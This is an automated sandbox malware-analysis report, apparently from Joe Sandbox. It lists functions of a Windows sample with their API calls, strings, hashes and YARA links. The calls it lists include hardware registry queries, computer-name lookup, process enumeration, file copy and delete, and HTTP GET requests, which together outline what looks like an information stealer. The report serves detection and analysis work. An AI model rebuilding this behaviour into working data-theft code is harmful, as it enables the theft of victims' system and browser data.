API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++${a
API String ID: 161838763-3895934703
Opcode ID: be3787a33560a855464051c0230fb6f50acf5043f78c6f85140136c7672f9b8c
Instruction ID: 259c20799d56e2eb1d9c440dd915f52fa4ab5957569178dec98b3956234c82d3
Opcode Fuzzy Hash: be3787a33560a855464051c0230fb6f50acf5043f78c6f85140136c7672f9b8c
Instruction Fuzzy Hash: 3A412C3290052AABCF80FBA9ED579CD7776AF04310F550424FE00B7252DB25AFA9CAD5

Function 006149DE Relevance: 7.6, APIs: 5, Instructions: 50stringnetworkCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00614A10
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00614A16
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00614A1C
lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00614A2E
InternetCrackUrlA.WININET(000000FF,00000000), ref: 00614A36

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID:
API String ID: 1274457161-0
Opcode ID: 052aedf20718e31616240c977d2eda9e2c2d5e19303ff889d476dd932510bbd2
Instruction ID: c72d27c619a7b4fdffe6132fe59593a344f1aec6aabd7563e2d77947e906bb1e
Opcode Fuzzy Hash: 052aedf20718e31616240c977d2eda9e2c2d5e19303ff889d476dd932510bbd2
Instruction Fuzzy Hash: AC015B32D00218ABCB049BA9DC45ADEBFB8AF46330F108216F921F72E0DB749641CB94

Function 00622BAD Relevance: 7.5, APIs: 5, Instructions: 35registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00625F8F,Processor: ,[Hardware],00647990,00000000,TimeZone: ,00647980,00000000,Local Time: ,0064796C), ref: 00622BC1
HeapAlloc.KERNEL32(00000000,?,?,?,00625F8F,Processor: ,[Hardware],00647990,00000000,TimeZone: ,00647980,00000000,Local Time: ,0064796C,Keyboard Languages: ,00647950), ref: 00622BC8
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,006478C8,?,?,?,00625F8F,Processor: ,[Hardware],00647990,00000000,TimeZone: ,00647980,00000000,Local Time: ), ref: 00622BE6
RegQueryValueExA.KERNEL32(006478C8,00000000,00000000,00000000,000000FF,?,?,?,00625F8F,Processor: ,[Hardware],00647990,00000000,TimeZone: ,00647980,00000000), ref: 00622C02
RegCloseKey.ADVAPI32(006478C8,?,?,?,00625F8F,Processor: ,[Hardware],00647990,00000000,TimeZone: ,00647980,00000000,Local Time: ,0064796C,Keyboard Languages: ,00647950), ref: 00622C0B

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 5b492e3c39aaaed9b661ba1e2bddd11e1c8094f9e9c3a91eadf219bdd3578978
Instruction ID: 78753cf47963e1ff711e6981bb82ee31511d6bb32735b4234039c6d3a30d1170
Opcode Fuzzy Hash: 5b492e3c39aaaed9b661ba1e2bddd11e1c8094f9e9c3a91eadf219bdd3578978
Instruction Fuzzy Hash: B7F03A75280304BFEB109BA0EC0EFAE7B7DFB45742F100164FB01A51A0EBB46A00DB60

Function 00619622 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,0061EAFD), ref: 0061963B

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Part of subcall function 006221A5: lstrlenA.KERNEL32(?,?,00629098,006477FE,00647787,?,?,?,?,00629D6E), ref: 006221AB
Part of subcall function 006221A5: lstrcpyA.KERNEL32(00000000,00000000,?,00629098,006477FE,00647787,?,?,?,?,00629D6E), ref: 006221DD

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 00622223: lstrcpyA.KERNEL32(00000000,?,0000000C,00629228,00647803), ref: 00622251
Part of subcall function 00622223: lstrcatA.KERNEL32(?,?), ref: 0062225B

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

SetEnvironmentVariableA.KERNEL32(?,00648334,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00647846,?,?,?,?,?,?,?,?,0061EAFD), ref: 00619690
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0061EAFD), ref: 006196A4

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0061962F, 00619634, 0061964E

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-4027016359
Opcode ID: 74fcdaccb4e2f02665fee1d6529333ae71a292540e686e012347216653013186
Instruction ID: 5c2e0117a0a9b22a149e654f7eb5de495de114f21fc975d8716d88d7e9ce4cae
Opcode Fuzzy Hash: 74fcdaccb4e2f02665fee1d6529333ae71a292540e686e012347216653013186
Instruction Fuzzy Hash: 11316F35A04715EFCF92AF69ED0AADDBBB2BB057027080529F500A3270DB791D95CF84

Function 00628B15 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55stringCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00628B1C
lstrlenA.KERNEL32(?,0000001C), ref: 00628B27
StrCmpCA.SHLWAPI(?,ERROR), ref: 00628BAB

Strings

ERROR, xrefs: 00628BA3

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: H_prolog3_catchlstrlen
String ID: ERROR
API String ID: 591506033-2861137601
Opcode ID: 8b82d450333565e44b80b08662f2cecb92c549dde882794d67e05fdb1ae9c260
Instruction ID: 8008dbed3fbee3bbec2296b0eacf9ee36e08afc39946aca6d9221fe363a9a0b3
Opcode Fuzzy Hash: 8b82d450333565e44b80b08662f2cecb92c549dde882794d67e05fdb1ae9c260
Instruction Fuzzy Hash: 04119071D0091AAFDB80FF74ED0699DBBB2BF04310B440129EA14E7161DB34AA65CFC8

Function 00623EE1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,'[b,00000000,?), ref: 00623F03
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00623F1E
CloseHandle.KERNEL32(00000000), ref: 00623F25

Strings

'[b, xrefs: 00623EF4, 00623EF9

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID: '[b
API String ID: 3183270410-951061916
Opcode ID: 419b5ad286e6194be6a9b2fa88060b63df0ff7ded67b60fe4d4fcf55e882bedd
Instruction ID: 46428f56b9b2459098df1cce0a3fc366d54a76a420d8e2475582dd35ec6a7ee5
Opcode Fuzzy Hash: 419b5ad286e6194be6a9b2fa88060b63df0ff7ded67b60fe4d4fcf55e882bedd
Instruction Fuzzy Hash: 51F0B435600618ABD710EB68EC45FEF77B9EB46B00F000069BA44D7280CFB4EA848B94

Function 0061C27B Relevance: 6.2, APIs: 4, Instructions: 196filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Part of subcall function 006238A6: GetSystemTime.KERNEL32(?,00647807,?), ref: 006238D5

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 00622223: lstrcpyA.KERNEL32(00000000,?,0000000C,00629228,00647803), ref: 00622251
Part of subcall function 00622223: lstrcatA.KERNEL32(?,?), ref: 0062225B

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

CopyFileA.KERNEL32(?,?,00000001), ref: 0061C320
lstrlenA.KERNEL32(?), ref: 0061C472
lstrlenA.KERNEL32(?), ref: 0061C48D
DeleteFileA.KERNEL32(?), ref: 0061C4DF

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: a5976462b4b9e2a5ebf192e41bd3f42e0b515babdf66b7b675b395ab6c07f290
Instruction ID: c7505c3420e27486ced5367aa3daeb7a74056f176b2ad5a2752302873ddfbdbf
Opcode Fuzzy Hash: a5976462b4b9e2a5ebf192e41bd3f42e0b515babdf66b7b675b395ab6c07f290
Instruction Fuzzy Hash: 4B712D32E0011AABCF40FBA9ED569DD7776BF04311F150825FA00B7162DB226FA6CB95

Function 00620D50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00620D57
std::_Xinvalid_argument.LIBCPMT ref: 00620D7D

Part of subcall function 00640478: std::exception::exception.LIBCMT ref: 0064048D
Part of subcall function 00640478: __CxxThrowException@8.LIBCMT ref: 006404A2
Part of subcall function 00640478: std::exception::exception.LIBCMT ref: 006404B3

Part of subcall function 00620927: malloc.MSVCRT ref: 00620936
Part of subcall function 00620927: __CxxThrowException@8.LIBCMT ref: 00620951

Strings

vector<T> too long, xrefs: 00620D78

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$H_prolog3_catchXinvalid_argumentmallocstd::_
String ID: vector<T> too long
API String ID: 285619538-3788999226
Opcode ID: 094626122607acd1cd6988a8d20af3f932a0a9a9a93b18295315378dc0a38943
Instruction ID: 81a0f48f1c81bb8584e1ebb6b9958a2fa4c14b2b3ba6ae5b63618307faf2cb65
Opcode Fuzzy Hash: 094626122607acd1cd6988a8d20af3f932a0a9a9a93b18295315378dc0a38943
Instruction Fuzzy Hash: 8A31AD71A00A1A9FEB50DF68D8419AEBBF3FF84310B20892DF595A7312DB30A941CF54

Function 0062858D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00622175: lstrcpyA.KERNEL32(00000000,?,?,00611CF7,?,00629260), ref: 00622194

Part of subcall function 0061688F: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 006168F1
Part of subcall function 0061688F: StrCmpCA.SHLWAPI(?), ref: 0061690B
Part of subcall function 0061688F: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0061693A
Part of subcall function 0061688F: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00616979
Part of subcall function 0061688F: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 006169A9
Part of subcall function 0061688F: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006169B4
Part of subcall function 0061688F: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 006169D8

StrCmpCA.SHLWAPI(?,ERROR), ref: 006285C2

Strings

ERROR, xrefs: 006285BA
ERROR, xrefs: 006285E5

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
String ID: ERROR$ERROR
API String ID: 3086566538-2579291623
Opcode ID: da5475db1e9cf6f533fbdce64974849db700e54fac4ff2b4be65defd69d3b88f
Instruction ID: 5c8dc46e0b1457a908e5a38dc5f6f310d6377a3effccf68a86b18eea6828c68b
Opcode Fuzzy Hash: da5475db1e9cf6f533fbdce64974849db700e54fac4ff2b4be65defd69d3b88f
Instruction Fuzzy Hash: AE01A271A00128BBCB90BB39EC578CD37BA6F44310B040965BE24A7213DB30EA648AD9

Function 00628BE6 Relevance: 4.6, APIs: 3, Instructions: 70sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8,?,?), ref: 00628C4D
CreateThread.KERNEL32(00000000,00000000,00628B15,?,00000000,00000000), ref: 00628C85
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00628C8D

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleSleepThreadWait
String ID:
API String ID: 4198075804-0
Opcode ID: 90cfde3755a05f0c45143890599cbff6cc7f932000c6be690aa602f0ce11be5b
Instruction ID: e6a0392d77f7063c9c8a13564d5c47484380bfc10d17ed4828c31a49ac29fb7b
Opcode Fuzzy Hash: 90cfde3755a05f0c45143890599cbff6cc7f932000c6be690aa602f0ce11be5b
Instruction Fuzzy Hash: 65216B7290162AAFCF10EF55EC45CDE7BBAFF41354B004029FA00A7211DB34AA86CFA0

Function 0062428C Relevance: 4.5, APIs: 3, Instructions: 41fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,006267CA), ref: 006242A6
WriteFile.KERNEL32(00000000,00000000,006267CA,006267CA,00000000,?,?,?,006267CA), ref: 006242CD
CloseHandle.KERNEL32(00000000,?,?,?,006267CA), ref: 006242E4

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: 7ddf82382758be370b31e648405ed45273e0365abe718a5a0cf8f451248cc4a4
Instruction ID: 5be8c4f9d7660603f255112ade2979399e8a286b42be55b57f1b2a10a85db883
Opcode Fuzzy Hash: 7ddf82382758be370b31e648405ed45273e0365abe718a5a0cf8f451248cc4a4
Instruction Fuzzy Hash: 31F09672202528FFDB015FA5EC86FEB3B5DEB023A5F004511FD0197190DB659E519BA4

Function 006228E1 Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00611375), ref: 006228ED
HeapAlloc.KERNEL32(00000000,?,?,?,00611375), ref: 006228F4
GetComputerNameA.KERNEL32(00000000,00611375), ref: 00622908

Memory Dump Source

